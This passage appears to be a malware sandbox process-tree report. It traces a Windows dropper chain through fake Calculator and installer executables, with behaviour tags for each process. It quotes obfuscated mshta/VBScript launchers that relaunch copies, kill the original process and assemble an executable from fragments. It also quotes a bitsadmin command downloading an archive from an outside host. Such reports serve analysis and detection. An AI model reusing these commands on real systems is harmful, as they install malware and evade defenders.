                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1804,10941048411921159893,3482529078965718897,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7424_1852806505" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=1756 /prefetch:1
                                                                                                                                                                          12⤵
                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                          PID:8856
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1804,10941048411921159893,3482529078965718897,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7424_1852806505" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2620 /prefetch:1
                                                                                                                                                                          12⤵
                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                          PID:8840
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1804,10941048411921159893,3482529078965718897,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7424_1852806505" --mojo-platform-channel-handle=2864 /prefetch:8
                                                                                                                                                                          12⤵
                                                                                                                                                                            PID:9072
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1804,10941048411921159893,3482529078965718897,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7424_1852806505" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3380 /prefetch:2
                                                                                                                                                                            12⤵
                                                                                                                                                                              PID:764
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1804,10941048411921159893,3482529078965718897,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7424_1852806505" --mojo-platform-channel-handle=2820 /prefetch:8
                                                                                                                                                                              12⤵
                                                                                                                                                                                PID:9064
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1804,10941048411921159893,3482529078965718897,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7424_1852806505" --mojo-platform-channel-handle=3856 /prefetch:8
                                                                                                                                                                                12⤵
                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                PID:6796
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1804,10941048411921159893,3482529078965718897,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7424_1852806505" --mojo-platform-channel-handle=1764 /prefetch:8
                                                                                                                                                                                12⤵
                                                                                                                                                                                  PID:2296
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1804,10941048411921159893,3482529078965718897,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7424_1852806505" --mojo-platform-channel-handle=1480 /prefetch:8
                                                                                                                                                                                  12⤵
                                                                                                                                                                                    PID:1748
                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\zphg9DvAIrDrXFQAeck5krKl.exe
                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\zphg9DvAIrDrXFQAeck5krKl.exe"
                                                                                                                                                                              9⤵
                                                                                                                                                                                PID:2840
                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\zphg9DvAIrDrXFQAeck5krKl.exe
                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\zphg9DvAIrDrXFQAeck5krKl.exe" -u
                                                                                                                                                                                  10⤵
                                                                                                                                                                                    PID:6884
                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\3HRBsEjn8fsRzwUB_ap1rMWy.exe
                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\3HRBsEjn8fsRzwUB_ap1rMWy.exe"
                                                                                                                                                                                  9⤵
                                                                                                                                                                                    PID:1908
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-ANDAD.tmp\3HRBsEjn8fsRzwUB_ap1rMWy.tmp
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-ANDAD.tmp\3HRBsEjn8fsRzwUB_ap1rMWy.tmp" /SL5="$80596,506127,422400,C:\Users\Admin\Pictures\Adobe Films\3HRBsEjn8fsRzwUB_ap1rMWy.exe"
                                                                                                                                                                                      10⤵
                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                      PID:6872
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-FODC1.tmp\DYbALA.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-FODC1.tmp\DYbALA.exe" /S /UID=2709
                                                                                                                                                                                        11⤵
                                                                                                                                                                                        • Drops file in Drivers directory
                                                                                                                                                                                        PID:4600
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\5a-156a6-c77-2639b-9c05f3ed8cdda\Jigecacela.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\5a-156a6-c77-2639b-9c05f3ed8cdda\Jigecacela.exe"
                                                                                                                                                                                          12⤵
                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                          PID:2348
                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k1uagn14.0fr\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                            13⤵
                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                            PID:1908
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\k1uagn14.0fr\GcleanerEU.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\k1uagn14.0fr\GcleanerEU.exe /eufive
                                                                                                                                                                                              14⤵
                                                                                                                                                                                                PID:6476
                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rzzg5hhh.qfc\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                              13⤵
                                                                                                                                                                                                PID:7808
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\rzzg5hhh.qfc\installer.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\rzzg5hhh.qfc\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                  PID:904
                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2cpyyg1o.4z3\any.exe & exit
                                                                                                                                                                                                13⤵
                                                                                                                                                                                                  PID:5996
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\2cpyyg1o.4z3\any.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\2cpyyg1o.4z3\any.exe
                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                      PID:4720
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\2cpyyg1o.4z3\any.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\2cpyyg1o.4z3\any.exe" -u
                                                                                                                                                                                                        15⤵
                                                                                                                                                                                                          PID:8736
                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f0ba4foj.ixt\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                        PID:2464
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\f0ba4foj.ixt\gcleaner.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\f0ba4foj.ixt\gcleaner.exe /mixfive
                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                            PID:7996
                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\t0u5i2hb.xqm\autosubplayer.exe /S & exit
                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                            PID:3696
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\t0u5i2hb.xqm\autosubplayer.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\t0u5i2hb.xqm\autosubplayer.exe /S
                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                              PID:3504
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb3E5B.tmp\tempfile.ps1"
                                                                                                                                                                                                                15⤵
                                                                                                                                                                                                                  PID:2308
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb3E5B.tmp\tempfile.ps1"
                                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                                    PID:9020
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb3E5B.tmp\tempfile.ps1"
                                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                                      PID:9080
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb3E5B.tmp\tempfile.ps1"
                                                                                                                                                                                                                      15⤵
                                                                                                                                                                                                                        PID:7900
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb3E5B.tmp\tempfile.ps1"
                                                                                                                                                                                                                        15⤵
                                                                                                                                                                                                                          PID:7588
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb3E5B.tmp\tempfile.ps1"
                                                                                                                                                                                                                          15⤵
                                                                                                                                                                                                                            PID:3304
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb3E5B.tmp\tempfile.ps1"
                                                                                                                                                                                                                            15⤵
                                                                                                                                                                                                                            • Checks for any installed AV software in registry
                                                                                                                                                                                                                            PID:3320
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                            "bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z
                                                                                                                                                                                                                            15⤵
                                                                                                                                                                                                                            • Download via BitsAdmin
                                                                                                                                                                                                                            PID:1968
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c Mon178d8e5d06822.exe
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:3812
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon178d8e5d06822.exe
                                                                                                                                                                                                            Mon178d8e5d06822.exe
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                            PID:2160
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                PID:4488
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                  PID:2152
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\2954983.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\2954983.exe"
                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    PID:5408
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\5338000.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\5338000.exe"
                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                    PID:5284
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\4151522.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\4151522.exe"
                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                    PID:6064
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\5406726.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\5406726.exe"
                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    PID:4488
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                      "C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Roaming\5406726.exe"" LYCw0J.ExE && stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF """" == """" for %T in ( ""C:\Users\Admin\AppData\Roaming\5406726.exe"") do taskkill /im ""%~nxT"" /f " , 0 , tRue ) )
                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                      PID:5768
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Roaming\5406726.exe" LYCw0J.ExE && stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF "" == "" for %T in ( "C:\Users\Admin\AppData\Roaming\5406726.exe") do taskkill /im "%~nxT" /f
                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                          PID:5508
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                            taskkill /im "5406726.exe" /f
                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                            PID:6212
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\2367830.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\2367830.exe"
                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                      PID:2196
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\5093277.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\5093277.exe"
                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      PID:5904
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    PID:3852
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\inst1.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    PID:2132
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\chrome.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\chrome.exe"
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                    PID:3500
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                      PID:5144
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\chrome2.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                    PID:1152
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                    PID:4296
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                      "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                      PID:3712
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                          PID:1324
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                                                                                                                                                                                            ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                            PID:5436
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                              PID:5728
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                                  PID:5976
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                  PID:1908
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                      PID:4852
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                                                          PID:648
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                                                            PID:5104
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                            msiexec -Y ..\lXQ2g.WC
                                                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                            PID:7832
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                      taskkill -f -iM "search_hyperfs_206.exe"
                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                      PID:6120
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\zhanglijuan-game.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\zhanglijuan-game.exe"
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                PID:2972
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                PID:4252
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 792
                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                  PID:5968
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 804
                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                  PID:1368
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 812
                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                  PID:5880
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 824
                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                  PID:5612
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 928
                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                  PID:5296
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Loads dropped DLL
